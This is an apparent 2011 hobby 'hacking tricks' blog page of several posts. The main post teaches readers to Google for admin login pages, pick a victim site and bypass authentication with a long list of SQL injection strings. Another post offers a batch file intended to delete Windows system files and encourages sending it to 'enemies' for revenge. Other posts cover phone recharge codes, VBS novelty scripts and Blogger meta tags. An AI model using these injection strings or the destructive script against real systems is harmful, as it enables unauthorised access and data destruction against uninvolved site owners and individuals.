Sunday, August 21, 2011

Hack Website With SQL Injection



Hello!
         In this post I'm gonna tell you how to hack and Admin access to a low security website with the help of SQL injection. SQL injection is a technique from which you can Admin login to a website without knowing the password. SQL stands for Structured Query Language. You can create new databases, delete records from a database, set permissions on tables, procedures, and views etc... The most important thing to admin login to a website with SQL is SQL injection strings.



How To Admin Access On Low Secured Websites?
To admin access to a low security website, first of all go to google.com and type admin login.asp. now choose your victim site and click on it. Now in Username, type admin, and in password paste any of the string given below and hit enter.
STRINGS:

1'or'1'='1
admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 # 
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 -- 
' or 0=0 # 
" or 0=0 # 
or 0=0 # 
' or 'x'='x 
" or "x"="x 
') or ('x'='x 
" or 1=1-- 
or 1=1-- 
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a 
' or 'a'='a 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 -- 
hi' or 1=1 -- 
hi' or 'a'='a 
hi') or ('a'='a 
hi") or ("a"="a 
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
The first string is the most important one. Many of the times it will say login failed but keep on trying with different strings.
NOTE: This technique will work only on low secured websites, not on every website.


Friday, August 19, 2011

Send Free Anonymous SMS Worldwide



Hello!
         Its a cool application. Now you can send SMS anonymously worldwide absolutely free of cost...!! Its fast and Easy...!!










Wednesday, August 17, 2011

Reliance Latest GPRS Trick 2011

You need a reliance connection with GPRS connectivity and opera browser    


 In opera settings you need to change
 settings  to
 APN : RCOMWAP
 PORT- 8080
 OPEN HANDLER AND ENTER 

 HTTP://69.171.240.109.SERVER4.OPERAMINI.COM

Tuesday, August 16, 2011

Recharge Method For Different Mobile Operators

Recharge Methods                                                                                      


 1. IDEA - *223*RECHARGE CODE#  *457*RECHARGE CODE#

 2. RELIANCE - *305* RECHARGE CODE#

 3. VODAFONE - *140*RECHARGE CODE#

 4. DOCOMO - *135*2*RECHARGE CODE#

5. AIRTEL - *101* RECHARGE CODE#

Like The Post

Monday, August 15, 2011

How To Make A Real Virus



Hello!
         Have you ever tried to take a revenge, but failed? or tried to make a virus?
In this post I'm gonna show you how to make a virus and completely destroy the PC of your enemy. As I always say "no mercy for enemies", so I'm gonna show you how to delete your enemie's windows. Before this post I showed you how to Make a fake shocking virus..!! but this time, its a real tragedy for your enemies...
To make a virus that deletes your victim's windows, just follow these simple steps..




STEPS:
1- Open notepad.
2- Type the below simple commands in it.
@echo off del c:\\windows\system 32
3- Now save it as  file.bat
4- Done!
After that, DON'T EVER TRY TO OPEN IT AT ANY COST. Now go ahead and send it to your enemies and take an awesome revenge.
Actually it's not a virus, its just a command to delete windows...




Friday, August 12, 2011

Some Cool PC Tricks



KNOW IF YOUR COMPUTER IS MALE OR FEMALE:
Hello!
         Do you wanna know if your computer is a male or female? 
In this post I'm gonna show you how to make your computer speak to know weather it  is a male or a female.
1- Open notepad paste these blue text in it and save it as File.vbs

CreateObject("SAPI.SpVoice").Speak"I Love You"
2- Open it and it will speak!


OPEN YOUR CD DRIVE:
To open your CD drive without pressing button, just paste this blue text in notepad and save it as file.vbs and after opening the file your CD drive will open.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count = 1 then
for i = 0 to colCDROMS.Count - 1
colCDROMs.Item(i).Eject
colCDROMs.Item(i).Eject
Next ' cdrom
end if


MAKE MATRIX:
Type this blue text in notepad and save it as File.bat and after opnening that file you will see cool matrix...
@echo off
:loop
COlor 0A
Title J J f f g g g g

echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop



Sunday, August 7, 2011

How To Add Meta Tags To Blogger (SEO)



Hello!
         In this post I'm gonna show you how to add meta tags to Blogger. By adding meta tags, your site can get more traffic from search engines like Google, Yahoo, Ask, msn Etc.
WHAT ARE META TAGS?
The tags which describe your site and tells all about your site to search engines are called meta tags. Adding
meta tags to your is really very important. Meta tags communicate with search engines and tells all about your site.. So to add meta tags to your blog just follow these simple steps...

STEPS:
1- Sign in to blogger.
2- Click on Design.
3- Click on edit HTML.
4- Find this code by pressing Ctrl + F.



5- Now add below code just after it.









6- Now replace DESCRIPTION HERE with the description of your blog, KEYWORDS HERE with the keywords of your blog, AUTHOR NAME HERE with the name of the author of your blog.
7- Done! save your template..